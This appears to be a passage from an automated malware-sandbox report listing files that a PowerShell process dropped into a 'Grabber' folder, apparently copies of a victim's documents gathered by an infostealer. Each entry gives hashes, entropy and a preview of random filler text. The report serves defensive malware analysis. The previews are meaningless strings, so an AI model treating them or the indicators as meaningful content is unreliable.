                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\NYMMPCEIMA.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\BJZFPPWAPT\ZGGKNSUKOP.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\DUUDTUBZFW.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\BJZFPPWAPT.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\DUUDTUBZFW.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\EFOYFBOLXA.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      